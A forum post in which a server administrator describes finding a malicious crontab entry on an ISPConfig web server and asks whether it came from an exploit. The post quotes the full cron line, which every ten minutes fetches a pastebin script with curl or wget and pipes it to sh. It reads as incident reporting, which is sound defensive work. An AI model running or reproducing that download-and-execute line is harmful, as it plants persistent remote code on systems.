ISPConfig 3.1.13, on Debian GNU/Linux 9.8 Stretch.

Web server root got email:

Code:
Date: Wed, 3 Apr 2019 15:30:03 +0300 (EEST)
From: [email protected]
To: [email protected]
Subject: *** SECURITY information for web.mydomain.tld ***

web.mydomain.tld : Apr  3 15:30:02 : webXYZ : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/clients/clientAB/webXYZ ; USER=root ;
+COMMAND=/usr/bin/crontab -

There is a crontab file for that user in /var/spool/cron/crontabs

Code:
[email protected]:~# ls -lh /var/spool/cron/crontabs/
total 12K
-rw------- 1 root   crontab 885 Mar 17 17:13 root
-rw------- 1 webXYZ crontab 285 Apr  4 10:39 webXYZ
[email protected]:~#

The file contains this line:

Code:
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh

Which, to my interpretation, downloads with curl (and if that is not available, with wget) a similar line with a different URL, but still from pastebin, which in turn downloads and executes code from https://pastebin.com/xmxHzu5P

That is a shell script, which first chmods /tmp and then kills processes and what not. Since this is not executed with root permissions, most of those commands should fail.

That webXYZ user has in ISPConfig Max. Allowed Cronjob types the value URL Cron.

Is it some exploit that the user can create crontab files?